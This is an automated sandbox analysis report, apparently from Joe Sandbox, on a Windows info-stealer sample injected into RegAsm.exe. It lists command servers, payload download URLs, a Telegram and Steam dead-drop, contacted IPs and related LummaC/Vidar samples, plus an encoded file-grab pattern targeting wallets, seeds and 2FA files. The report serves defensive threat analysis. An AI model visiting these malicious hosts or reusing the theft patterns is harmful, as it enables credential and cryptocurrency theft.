                            https://5.75.211.162AAAFCRegAsm.exe, 00000002.00000002.3293044181.000000000046B000.00000040.00000400.00020000.00000000.sdmptrue
                            • Avira URL Cloud: safe
                            		unknown
                            https://dbsmena.com/ljhgfsd.exea;RegAsm.exe, 00000002.00000002.3293044181.0000000000563000.00000040.00000400.00020000.00000000.sdmpfalse
                            • Avira URL Cloud: safe
                            		unknown
                            https://community.akamai.steamstatic.com/public/shared/css/shared_responsive.css?v=sHIIcMzCffX6&RegAsm.exe, 00000002.00000002.3293044181.000000000046B000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 00000002.00000002.3293998119.000000000135F000.00000004.00000020.00020000.00000000.sdmp, 76561199780418869[1].htm.2.drfalse
                            • URL Reputation: safe
                            		unknown
                            https://steamcommunity.com/profiles/76561199780418869$RegAsm.exe, 00000002.00000002.3293998119.0000000001331000.00000004.00000020.00020000.00000000.sdmpfalse
                            • Avira URL Cloud: safe
                            		unknown
                            https://www.valvesoftware.com/en/contact?contact-person=Translation%20Team%20FeedbackRegAsm.exe, 00000002.00000002.3293044181.000000000046B000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 00000002.00000002.3293998119.000000000135F000.00000004.00000020.00020000.00000000.sdmp, 76561199780418869[1].htm.2.drfalse
                            • Avira URL Cloud: safe
                            		unknown
                            https://steamcommunity.com/profiles/76561199780418869u55uhttps://t.me/ae5edMozilla/5.0file.exe, 00000000.00000002.2060446715.0000000003FE5000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 00000002.00000002.3293044181.0000000000400000.00000040.00000400.00020000.00000000.sdmptrue
                            • Avira URL Cloud: safe
                            		unknown
                            https://5.75.211.16276561199780418869[1].htm.2.drtrue
                            • Avira URL Cloud: malware
                            		unknown
                            https://community.akamai.steamstatic.com/public/javascript/scriptaculous/_combined.js?v=OeNIgrpEF8tLRegAsm.exe, 00000002.00000002.3293044181.000000000046B000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 00000002.00000002.3293998119.000000000135F000.00000004.00000020.00020000.00000000.sdmp, 76561199780418869[1].htm.2.drfalse
                            • URL Reputation: safe
                            		unknown
                            https://steamcommunity.com/profiles/765611997804188695RegAsm.exe, 00000002.00000002.3293998119.0000000001331000.00000004.00000020.00020000.00000000.sdmpfalse
                            • Avira URL Cloud: safe
                            		unknown
                            https://store.steampowered.com/privacRegAsm.exe, 00000002.00000002.3293044181.000000000046B000.00000040.00000400.00020000.00000000.sdmpfalse
                            • Avira URL Cloud: safe
                            		unknown
                            https://t.me/ae5edfile.exe, 00000000.00000002.2060446715.0000000003FE5000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, RegAsm.exe, 00000002.00000002.3293044181.0000000000400000.00000040.00000400.00020000.00000000.sdmptrue
                            • Avira URL Cloud: malware
                            		unknown
                            http://www.mozilla.com/en-US/blocklist/RegAsm.exe, RegAsm.exe, 00000002.00000002.3307228055.0000000028FBA000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000002.00000002.3325754871.000000006C10D000.00000002.00000001.01000000.00000009.sdmp, mozglue.dll.2.drfalse
                            • Avira URL Cloud: safe
                            		unknown
                            https://community.akamai.steamstatic.com/public/css/skin_1/header.css?v=NFoCa4OkAxRb&l=englishRegAsm.exe, 00000002.00000002.3293044181.000000000046B000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 00000002.00000002.3293998119.000000000135F000.00000004.00000020.00020000.00000000.sdmp, 76561199780418869[1].htm.2.drfalse
                            • URL Reputation: safe
                            		unknown
                            https://mozilla.org0/RegAsm.exe, 00000002.00000002.3312936893.0000000034E93000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000002.00000002.3318468661.0000000040D70000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000002.00000002.3307228055.0000000028FBA000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000002.00000002.3304395342.0000000023050000.00000004.00000020.00020000.00000000.sdmp, freebl3.dll.2.dr, softokn3.dll.2.dr, mozglue.dll.2.dr, nss3.dll.2.drfalse
                            • URL Reputation: safe
                            		unknown
                            https://community.akamai.steamstatic.com/public/javascript/applications/community/manifest.js?v=WnGPRegAsm.exe, 00000002.00000002.3293044181.000000000046B000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 00000002.00000002.3293998119.000000000135F000.00000004.00000020.00020000.00000000.sdmp, 76561199780418869[1].htm.2.drfalse
                            • Avira URL Cloud: safe
                            		unknown
                            http://www.entrust.net/rpa03file.exefalse
                            • URL Reputation: safe
                            		unknown
                            http://store.steampowered.com/privacy_agreement/RegAsm.exe, 00000002.00000002.3293044181.000000000046B000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 00000002.00000002.3293998119.000000000135F000.00000004.00000020.00020000.00000000.sdmp, 76561199780418869[1].htm.2.drfalse
                            • URL Reputation: safe
                            		unknown
                            https://dbsmena.com/ljhgfsd.exefCp3YWxsZXQqLiosKnNlZWQqLiosKmJ0YyouKiwqa2V5Ki4qLCoyZmEqLiosKmNyeXB0bRegAsm.exe, 00000002.00000002.3293044181.0000000000563000.00000040.00000400.00020000.00000000.sdmpfalse
                            • Avira URL Cloud: safe
                            		unknown
                            https://store.steampowered.com/points/shop/RegAsm.exe, 00000002.00000002.3293044181.000000000046B000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 00000002.00000002.3293998119.000000000135F000.00000004.00000020.00020000.00000000.sdmp, 76561199780418869[1].htm.2.drfalse
                            • Avira URL Cloud: safe
                            		unknown
                            https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=AAAAKJ.2.drfalse
                            • URL Reputation: safe
                            		unknown
                            https://www.ecosia.org/newtab/AAAAKJ.2.drfalse
                            • URL Reputation: safe
                            		unknown
                            https://support.mozilla.org/kb/customize-firefox-controls-buttons-and-toolbars?utm_source=firefox-brEBKKKE.2.drfalse
                            • URL Reputation: safe
                            		unknown
                            https://avatars.akamai.steamstatic.com/fef49e7fa7e1997310d705b2a6158ff8dc1cdfeb_full.jpg76561199780418869[1].htm.2.drfalse
                            • URL Reputation: safe
                            		unknown
                            https://store.steampowered.com/privacy_agreement/RegAsm.exe, 00000002.00000002.3293044181.000000000046B000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 00000002.00000002.3293998119.000000000135F000.00000004.00000020.00020000.00000000.sdmp, 76561199780418869[1].htm.2.drfalse
                            • Avira URL Cloud: safe
                            		unknown
                            https://community.akamai.steamstatic.com/public/shared/css/shared_global.css?v=ezWS9te9Zwm9&l=enRegAsm.exe, 00000002.00000002.3293044181.000000000046B000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 00000002.00000002.3293998119.000000000135F000.00000004.00000020.00020000.00000000.sdmp, 76561199780418869[1].htm.2.drfalse
                            • Avira URL Cloud: safe
                            		unknown
                            https://community.akamai.steamstatic.com/public/shared/javascript/tooltip.js?v=.zYHOpI1L3Rt0RegAsm.exe, 00000002.00000002.3293044181.000000000046B000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 00000002.00000002.3293998119.000000000135F000.00000004.00000020.00020000.00000000.sdmp, 76561199780418869[1].htm.2.drfalse
                            • URL Reputation: safe
                            		unknown
                            https://dbsmena.com/ljhgfsd.exe1kkkk1218740https://dbsmena.com/vdshfd.exe1kkkk783966f7e54258RegAsm.exe, 00000002.00000002.3293044181.000000000046B000.00000040.00000400.00020000.00000000.sdmpfalse
                            • Avira URL Cloud: safe
                            		unknown
                            https://community.akamai.steamstatic.com/public/shared/javascript/shared_global.js?v=REEGJU1hwkYl&amRegAsm.exe, 00000002.00000002.3293044181.000000000046B000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 00000002.00000002.3293998119.000000000135F000.00000004.00000020.00020000.00000000.sdmp, 76561199780418869[1].htm.2.drfalse
                            • URL Reputation: safe
                            		unknown
                            https://support.mozilla.org/products/firefoxgro.allizom.troppus.GVegJq3nFfBLEBKKKE.2.drfalse
                            • Avira URL Cloud: safe
                            		unknown
                            https://community.akamai.steamstatic.com/public/css/globalv2.css?v=PAcV2zMBzzSV&l=englishRegAsm.exe, 00000002.00000002.3293044181.000000000046B000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 00000002.00000002.3293998119.000000000135F000.00000004.00000020.00020000.00000000.sdmp, 76561199780418869[1].htm.2.drfalse
                            • URL Reputation: safe
                            		unknown
                            https://www.bestbuy.com/site/electronics/top-deals/pcmcat1563299784494.c/?id=pcmcat1563299784494&refRegAsm.exe, 00000002.00000002.3293998119.00000000014BE000.00000004.00000020.00020000.00000000.sdmp, CFHDBF.2.drfalse
                            • Avira URL Cloud: safe
                            		unknown
                            https://community.akamai.steamstatic.com/public/javascript/modalv2.js?v=dfMhuy-Lrpyo&l=englishRegAsm.exe, 00000002.00000002.3293044181.000000000046B000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 00000002.00000002.3293998119.000000000135F000.00000004.00000020.00020000.00000000.sdmp, 76561199780418869[1].htm.2.drfalse
                            • Avira URL Cloud: safe
                            		unknown
                            https://www.amazon.com/?tag=admarketus-20&ref=pd_sl_35787f1071928bc3a1aef90b79c9bee9c64ba6683fde7477RegAsm.exe, 00000002.00000002.3293998119.00000000014BE000.00000004.00000020.00020000.00000000.sdmp, CFHDBF.2.drfalse
                            • Avira URL Cloud: safe
                            		unknown
                            https://dbsmena.com/ljhgfsd.exe)RegAsm.exe, 00000002.00000002.3293998119.000000000135F000.00000004.00000020.00020000.00000000.sdmpfalse
                            • Avira URL Cloud: safe
                            		unknown
                            https://community.akamai.steamstatic.com/public/shared/images/responsive/header_logo.pngRegAsm.exe, 00000002.00000002.3293044181.000000000046B000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 00000002.00000002.3293998119.000000000135F000.00000004.00000020.00020000.00000000.sdmp, 76561199780418869[1].htm.2.drfalse
                            • Avira URL Cloud: safe
                            		unknown
                            https://community.akamai.steamstatic.com/public/css/skin_1/profilev2.css?v=M_qL4gO2sKII&l=englisRegAsm.exe, 00000002.00000002.3293044181.000000000046B000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 00000002.00000002.3293998119.000000000135F000.00000004.00000020.00020000.00000000.sdmp, 76561199780418869[1].htm.2.drfalse
                            • URL Reputation: safe
                            		unknown
                            http://crl.entrust.net/2048ca.crl0file.exefalse
                            • URL Reputation: safe
                            		unknown
                            https://community.akamai.steamstatic.com/public/javascript/jquery-1.11.1.min.js?v=.isFTSRckeNhCRegAsm.exe, 00000002.00000002.3293044181.000000000046B000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 00000002.00000002.3293998119.000000000135F000.00000004.00000020.00020000.00000000.sdmp, 76561199780418869[1].htm.2.drfalse
                            • URL Reputation: safe
                            		unknown
                            https://www.entrust.net/rpa0file.exefalse
                            • URL Reputation: safe
                            		unknown
                            https://store.steampowered.com/about/76561199780418869[1].htm.2.drfalse
                            • URL Reputation: safe
                            		unknown
                            https://steamcommunity.com/my/wishlist/RegAsm.exe, 00000002.00000002.3293044181.000000000046B000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 00000002.00000002.3293998119.000000000135F000.00000004.00000020.00020000.00000000.sdmp, 76561199780418869[1].htm.2.drfalse
                            • Avira URL Cloud: safe
                            		unknown
                            https://community.akamai.steamstatic.com/public/javascript/global.js?v=9OzcxMXbaV84&l=englishRegAsm.exe, 00000002.00000002.3293044181.000000000046B000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 00000002.00000002.3293998119.000000000135F000.00000004.00000020.00020000.00000000.sdmp, 76561199780418869[1].htm.2.drfalse
                            • URL Reputation: safe
                            		unknown
                            https://5.75.211.162rt/form-data;RegAsm.exe, 00000002.00000002.3293044181.0000000000563000.00000040.00000400.00020000.00000000.sdmptrue
                            • Avira URL Cloud: safe
                            		unknown
                            http://ocsp.entrust.net03file.exefalse
                            • URL Reputation: safe
                            		unknown
                            http://ocsp.entrust.net02file.exefalse
                            • URL Reputation: safe
                            		unknown
                            https://help.steampowered.com/en/RegAsm.exe, 00000002.00000002.3293044181.000000000046B000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 00000002.00000002.3293998119.000000000135F000.00000004.00000020.00020000.00000000.sdmp, 76561199780418869[1].htm.2.drfalse
                            • URL Reputation: safe
                            		unknown
                            https://steamcommunity.com/market/RegAsm.exe, 00000002.00000002.3293044181.000000000046B000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 00000002.00000002.3293998119.000000000135F000.00000004.00000020.00020000.00000000.sdmp, 76561199780418869[1].htm.2.drfalse
                            • Avira URL Cloud: safe
                            		unknown
                            https://store.steampowered.com/news/RegAsm.exe, 00000002.00000002.3293044181.000000000046B000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 00000002.00000002.3293998119.000000000135F000.00000004.00000020.00020000.00000000.sdmp, 76561199780418869[1].htm.2.drfalse
                            • Avira URL Cloud: safe
                            		unknown
                            https://imp.mt48.net/static?id=7RHzfOIXjFEYsBdvIpkX4Qqm4p8dfCfm4pbW1pbWfpbW7ReNxR3UIG8zInwYIFIVs9eYiCFHDBF.2.drfalse
                            • Avira URL Cloud: safe
                            		unknown
                            https://dbsmena.com/ljhgfsd.exe?RegAsm.exe, 00000002.00000002.3293998119.000000000135F000.00000004.00000020.00020000.00000000.sdmpfalse
                            • Avira URL Cloud: safe
                            		unknown
                            https://5.75.211.162/softokn3.dll6V#~RegAsm.exe, 00000002.00000002.3293998119.000000000135F000.00000004.00000020.00020000.00000000.sdmptrue
                            • Avira URL Cloud: malware
                            		unknown
                            https://5.75.211.162AKKJDRegAsm.exe, 00000002.00000002.3293044181.00000000005A1000.00000040.00000400.00020000.00000000.sdmptrue
                            • Avira URL Cloud: safe
                            		unknown
                            https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=AAAAKJ.2.drfalse
                            • URL Reputation: safe
                            		unknown
                            http://store.steampowered.com/subscriber_agreement/RegAsm.exe, 00000002.00000002.3293044181.000000000046B000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 00000002.00000002.3293998119.000000000135F000.00000004.00000020.00020000.00000000.sdmp, 76561199780418869[1].htm.2.drfalse
                            • URL Reputation: safe
                            		unknown
                            https://steamcommunity.com/linkfilter/?u=http%3A%2F%2Fwww.geonames.orgRegAsm.exe, 00000002.00000002.3293044181.000000000046B000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 00000002.00000002.3293998119.000000000135F000.00000004.00000020.00020000.00000000.sdmp, 76561199780418869[1].htm.2.drfalse
                            • Avira URL Cloud: safe
                            		unknown
                            https://community.akamai.steamstatic.com/public/css/skin_1/modalContent.css?v=.VpiwkLAYt9r1RegAsm.exe, 00000002.00000002.3293044181.000000000046B000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 00000002.00000002.3293998119.000000000135F000.00000004.00000020.00020000.00000000.sdmp, 76561199780418869[1].htm.2.drfalse
                            • Avira URL Cloud: safe
                            		unknown
                            https://community.akamai.steamstatic.com/public/javascript/promo/stickers.js?v=upl9NJ5D2xkP&l=enRegAsm.exe, 00000002.00000002.3293044181.000000000046B000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 00000002.00000002.3293998119.000000000135F000.00000004.00000020.00020000.00000000.sdmp, 76561199780418869[1].htm.2.drfalse
                            • Avira URL Cloud: safe
                            		unknown
                            https://steamcommunity.com/profiles/76561199780418869/inventory/RegAsm.exe, 00000002.00000002.3293044181.000000000046B000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 00000002.00000002.3293998119.000000000135F000.00000004.00000020.00020000.00000000.sdmp, 76561199780418869[1].htm.2.drfalse
                            • Avira URL Cloud: malware
                            		unknown
                            https://steamcommunity.com/discussions/RegAsm.exe, 00000002.00000002.3293044181.000000000046B000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 00000002.00000002.3293998119.000000000135F000.00000004.00000020.00020000.00000000.sdmp, 76561199780418869[1].htm.2.drfalse
                            • Avira URL Cloud: safe
                            		unknown
                            https://community.akamai.steamstatic.com/public/css/applications/community/main.css?v=nSnUuYf7g6U1&aRegAsm.exe, 00000002.00000002.3293044181.000000000046B000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 00000002.00000002.3293998119.000000000135F000.00000004.00000020.00020000.00000000.sdmp, 76561199780418869[1].htm.2.drfalse
                            • Avira URL Cloud: safe
                            		unknown
                            https://store.steampowered.com/stats/RegAsm.exe, 00000002.00000002.3293044181.000000000046B000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 00000002.00000002.3293998119.000000000135F000.00000004.00000020.00020000.00000000.sdmp, 76561199780418869[1].htm.2.drfalse
                            • Avira URL Cloud: safe
                            		unknown
                            https://community.akamai.steamstatic.com/public/images/skin_1/footerLogo_valve.png?v=1RegAsm.exe, 00000002.00000002.3293044181.000000000046B000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 00000002.00000002.3293998119.000000000135F000.00000004.00000020.00020000.00000000.sdmp, 76561199780418869[1].htm.2.drfalse
                            • URL Reputation: safe
                            		unknown
                            https://store.steampowered.com/steam_refunds/RegAsm.exe, 00000002.00000002.3293044181.000000000046B000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 00000002.00000002.3293998119.000000000135F000.00000004.00000020.00020000.00000000.sdmp, 76561199780418869[1].htm.2.drfalse
                            • Avira URL Cloud: safe
                            		unknown
                            https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/searchAAAAKJ.2.drfalse
                            • URL Reputation: safe
                            		unknown
                            https://5.75.211.162/xmx~3RegAsm.exe, 00000002.00000002.3293998119.000000000135F000.00000004.00000020.00020000.00000000.sdmptrue
                            • Avira URL Cloud: malware
                            		unknown
                            https://dbsmena.com/vdshfd.exetent-Disposition:RegAsm.exe, 00000002.00000002.3293044181.000000000046B000.00000040.00000400.00020000.00000000.sdmpfalse
                            • Avira URL Cloud: safe
                            		unknown
                            http://crl.entrust.net/ts1ca.crl0file.exefalse
                            • URL Reputation: safe
                            		unknown
                            https://steamcommunity.com/workshop/RegAsm.exe, 00000002.00000002.3293044181.000000000046B000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 00000002.00000002.3293998119.000000000135F000.00000004.00000020.00020000.00000000.sdmp, 76561199780418869[1].htm.2.drfalse
                            • Avira URL Cloud: safe
                            		unknown
                            https://steamcommunity.com/6RegAsm.exe, 00000002.00000002.3293998119.0000000001331000.00000004.00000020.00020000.00000000.sdmpfalse
                            • Avira URL Cloud: safe
                            		unknown
                            https://store.steampowered.com/legal/RegAsm.exe, 00000002.00000002.3293044181.000000000046B000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 00000002.00000002.3293998119.000000000135F000.00000004.00000020.00020000.00000000.sdmp, 76561199780418869[1].htm.2.drfalse
                            • URL Reputation: safe
                            		unknown
                            https://community.akamai.steamstatic.com/public/javascript/reportedcontent.js?v=dAtjbcZMWhSe&l=eRegAsm.exe, 00000002.00000002.3293044181.000000000046B000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 00000002.00000002.3293998119.000000000135F000.00000004.00000020.00020000.00000000.sdmp, 76561199780418869[1].htm.2.drfalse
                            • URL Reputation: safe
                            		unknown
                            http://www.sqlite.org/copyright.html.RegAsm.exe, 00000002.00000002.3299208500.000000001C9E7000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000002.00000002.3304083321.000000002298D000.00000002.00001000.00020000.00000000.sdmpfalse
                            • URL Reputation: safe
                            		unknown
                            https://dbsmena.com/RegAsm.exe, 00000002.00000002.3293998119.000000000135F000.00000004.00000020.00020000.00000000.sdmpfalse
                            • Avira URL Cloud: safe
                            		unknown
                            https://community.akamai.steamstatic.com/public/shared/javascript/shared_responsive_adapter.js?v=pSvRegAsm.exe, 00000002.00000002.3293044181.000000000046B000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 00000002.00000002.3293998119.000000000135F000.00000004.00000020.00020000.00000000.sdmp, 76561199780418869[1].htm.2.drfalse
                            • Avira URL Cloud: safe
                            		unknown
                            https://community.akamai.steamstatic.com/public/shared/css/motiva_sans.css?v=-DH0xTYpnVe2&l=engl76561199780418869[1].htm.2.drfalse
                            • URL Reputation: safe
                            		unknown
                            https://www.google.com/images/branding/product/ico/googleg_lodp.icoAAAAKJ.2.drfalse
                            • Avira URL Cloud: safe
                            		unknown
                            https://steamcommunity.com/login/home/?goto=profiles%2F7656119978041886976561199780418869[1].htm.2.drfalse
                            • Avira URL Cloud: safe
                            		unknown
                            https://5.75.211.162EBFBARegAsm.exe, 00000002.00000002.3293044181.0000000000563000.00000040.00000400.00020000.00000000.sdmptrue
                            • Avira URL Cloud: safe
                            		unknown
                            http://aia.entrust.net/ts1-chain256.cer01file.exefalse
                            • URL Reputation: safe
                            		unknown

                            World Map of Contacted IPs

                            • No. of IPs < 25%
                            • 25% < No. of IPs < 50%
                            • 50% < No. of IPs < 75%
                            • 75% < No. of IPs

                            Public IPs

                            IPDomainCountryFlagASNASN NameMalicious
                            104.102.49.254
                            		steamcommunity.comUnited States
                            		16625AKAMAI-ASUStrue
                            5.75.211.162
                            		unknownGermany
                            		24940HETZNER-ASDEtrue
                            172.105.54.160
                            		dbsmena.comUnited States
                            		63949LINODE-APLinodeLLCUSfalse

                            General Information

                            Joe Sandbox version:41.0.0 Charoite
                            Analysis ID:1519637
                            Start date and time:2024-09-26 19:04:09 +02:00
                            Joe Sandbox product:CloudBasic
                            Overall analysis duration:0h 6m 54s
                            Hypervisor based Inspection enabled:false
                            Report type:full
                            Cookbook file name:default.jbs
                            Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                            Number of analysed new started processes analysed:7
                            Number of new started drivers analysed:0
                            Number of existing processes analysed:0
                            Number of existing drivers analysed:0
                            Number of injected processes analysed:0
                            Technologies:
                            • HCA enabled
                            • EGA enabled
                            • AMSI enabled
                            Analysis Mode:default
                            Analysis stop reason:Timeout
                            Sample name:file.exe
                            Detection:MAL
                            Classification:mal100.troj.spyw.evad.winEXE@5/25@2/3
                            EGA Information:
                            • Successful, ratio: 100%
                            HCA Information:
                            • Successful, ratio: 100%
                            • Number of executed functions: 91
                            • Number of non-executed functions: 260
                            Cookbook Comments:
                            • Found application associated with file extension: .exe

                            Warnings

                            • Exclude process from analysis (whitelisted): dllhost.exe, WMIADAP.exe, SIHClient.exe, svchost.exe
                            • Excluded domains from analysis (whitelisted): fs.microsoft.com, ocsp.digicert.com, slscr.update.microsoft.com, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
                            • Not all processes where analyzed, report is missing behavior information
                            • Report size exceeded maximum capacity and may have missing disassembly code.
                            • Report size getting too big, too many NtAllocateVirtualMemory calls found.
                            • Report size getting too big, too many NtOpenKeyEx calls found.
                            • Report size getting too big, too many NtProtectVirtualMemory calls found.
                            • Report size getting too big, too many NtQueryAttributesFile calls found.
                            • Report size getting too big, too many NtQueryValueKey calls found.
                            • Some HTTPS proxied raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
                            • VT rate limit hit for: file.exe

                            Simulations

                            Behavior and APIs

                            TimeTypeDescription
                            13:05:35API Interceptor1x Sleep call for process: RegAsm.exe modified

                            Joe Sandbox View / Context

                            IPs

                            MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                            104.102.49.254file.exeGet hashmaliciousUnknownBrowse
                              3ZD5tEC5DH.exeGet hashmaliciousLummaCBrowse
                                a7HdB2dU5P.exeGet hashmaliciousLummaCBrowse
                                  Z09QznvZSr.exeGet hashmaliciousUnknownBrowse
                                    file.exeGet hashmaliciousLummaC, VidarBrowse
                                      HHXyi02DYl.exeGet hashmaliciousLummaCBrowse
                                        bYQ9uTqLzz.exeGet hashmaliciousLummaCBrowse
                                          HHXyi02DYl.exeGet hashmaliciousUnknownBrowse
                                            SecuriteInfo.com.Win64.Malware-gen.15701.20735.exeGet hashmaliciousLummaC, Go Injector, LummaC Stealer, MicroClipBrowse
                                              SecuriteInfo.com.Win64.Evo-gen.13360.8133.exeGet hashmaliciousLummaC, Go Injector, LummaC StealerBrowse
                                                5.75.211.162file.exeGet hashmaliciousUnknownBrowse
                                                  Z09QznvZSr.exeGet hashmaliciousUnknownBrowse
                                                    file.exeGet hashmaliciousLummaC, VidarBrowse
                                                      file.exeGet hashmaliciousLummaC, VidarBrowse
                                                        file.exeGet hashmaliciousLummaC, VidarBrowse
                                                          file.exeGet hashmaliciousLummaC, Stealc, VidarBrowse
                                                            file.exeGet hashmaliciousLummaC, VidarBrowse

                                                              Domains

                                                              MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                              steamcommunity.comfile.exeGet hashmaliciousUnknownBrowse
                                                              • 104.102.49.254
                                                              3ZD5tEC5DH.exeGet hashmaliciousLummaCBrowse
                                                              • 104.102.49.254
                                                              a7HdB2dU5P.exeGet hashmaliciousLummaCBrowse
                                                              • 104.102.49.254
                                                              Z09QznvZSr.exeGet hashmaliciousUnknownBrowse
                                                              • 104.102.49.254
                                                              file.exeGet hashmaliciousLummaC, VidarBrowse
                                                              • 104.102.49.254
                                                              HHXyi02DYl.exeGet hashmaliciousLummaCBrowse
                                                              • 104.102.49.254
                                                              bYQ9uTqLzz.exeGet hashmaliciousLummaCBrowse
                                                              • 104.102.49.254
                                                              HHXyi02DYl.exeGet hashmaliciousUnknownBrowse
                                                              • 104.102.49.254
                                                              SecuriteInfo.com.Win64.Malware-gen.15701.20735.exeGet hashmaliciousLummaC, Go Injector, LummaC Stealer, MicroClipBrowse
                                                              • 104.102.49.254
                                                              SecuriteInfo.com.Win64.Evo-gen.13360.8133.exeGet hashmaliciousLummaC, Go Injector, LummaC StealerBrowse
                                                              • 104.102.49.254

                                                              ASNs

                                                              MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                              LINODE-APLinodeLLCUShttp://rephase.aiGet hashmaliciousUnknownBrowse
                                                              • 45.33.30.197
                                                              https://shiseiki.com/Get hashmaliciousUnknownBrowse
                                                              • 172.104.100.133
                                                              file.exeGet hashmaliciousUnknownBrowse
                                                              • 139.162.110.14
                                                              http://trello.com/c/VmtGBtm4Get hashmaliciousHTMLPhisherBrowse
                                                              • 45.33.8.19
                                                              file.exeGet hashmaliciousUnknownBrowse
                                                              • 139.162.110.14
                                                              1445321243TK.pdfGet hashmaliciousUnknownBrowse
                                                              • 69.164.210.100
                                                              https://0nline1.worldsfree.online/?U0=axzRlLTExNmZlODFkZTkwZgAQAKBHMctqAUR3r65X8nGy3n0%3DGet hashmaliciousHTMLPhisherBrowse
                                                              • 139.162.182.75
                                                              5qcJn1lfO5.rtfGet hashmaliciousRemcos, PureLog StealerBrowse
                                                              • 45.79.190.156
                                                              https://wanshaofu.top/Get hashmaliciousHTMLPhisherBrowse
                                                              • 69.164.203.87
                                                              Ziraat Bankas#U0131 Swift Mesaj#U0131.docx.docGet hashmaliciousRemcos, PureLog StealerBrowse
                                                              • 45.79.190.156
                                                              AKAMAI-ASUSphish_alert_sp2_2.0.0.0(10).emlGet hashmaliciousHTMLPhisherBrowse
                                                              • 184.28.90.27
                                                              https://www.google.co.za/url?q=xtcjw2geVaKWnfmdoGJR&rct=plPBlHNa5kwdhss6Wkqp&sa=t&esrc=513lj8JvP7Ittpg5uakw&source=&cd=HEdeaS5QG8iPRKWBvNC5&cad=v3vi70ntSK6fhpPYoZj8&ved=blJ54Mupbf2HcJbicYcQ&uact=&url=amp/s%2Furl.za.m.mimecastprotect.com/s/BjZHCy856GFEJl8cZf1CxlF3BGet hashmaliciousUnknownBrowse
                                                              • 88.221.169.152
                                                              https://kusjp5q7xwyt.larksuite.com/wiki/XzhhwohBhigCbykSafAueRYKsXd?from=from_copylinkGet hashmaliciousEvilProxy, HTMLPhisherBrowse
                                                              • 2.16.202.91
                                                              Final_Contract_Copy-532392974.pdfGet hashmaliciousUnknownBrowse
                                                              • 23.56.162.185
                                                              file.exeGet hashmaliciousUnknownBrowse
                                                              • 104.102.49.254
                                                              Final_Contract_Copy-532392974.pdfGet hashmaliciousUnknownBrowse
                                                              • 23.203.104.175
                                                              https://kusjp5q7xwyt.larksuite.com/wiki/XzhhwohBhigCbykSafAueRYKsXd?from=from_copylinkGet hashmaliciousEvilProxy, HTMLPhisherBrowse
                                                              • 2.19.126.78
                                                              You have a held messages (dawie@ddebeer.co.za).msgGet hashmaliciousUnknownBrowse
                                                              • 184.28.90.27
                                                              https://topawardpicks.topGet hashmaliciousUnknownBrowse
                                                              • 23.220.132.219
                                                              https://storage.googleapis.com/inbound-mail-attachments-prod/0cbecb77-b573-4b3b-8c97-8b461d262d51?GoogleAccessId=distribution-controller-prod@inbound-mail-attachments.iam.gserviceaccount.com&Expires=1758806989&Signature=teNXGJRcW9uuEoVVvD0bLb%2BTGBorxpSu89OlgLR0AZpo8aoMl3JFsBDoXmLnj9QMk%2BAPu8iGsKTPrT4i0XSxxzRmtCLdsbDi23%2FFHfN4OpU3mOnUXtbZ81e7h5Ax%2FIygnxvogL7iGUXrqQUBZEnVkPmXcpAMmBTX7%2Bj4kVf57xBQo4WA9yGdv5Df4b9nDGZMXEYZVxWjPtOk4%2FXapMoV5bYJLgpB%2BR%2F1LUE0IwT1d3wuv1q6TONtaWwducy4mc1%2FJvGqxFuxuW9Y6Ojq%2B7a%2FqCW4DaFdd42O6ViY63C8G7dPbTe9LtxhwHcAk9xg3n5kXh2Z75tDAkK2Ak5mKneP6g%3D%3DGet hashmaliciousUnknownBrowse
                                                              • 184.28.90.27
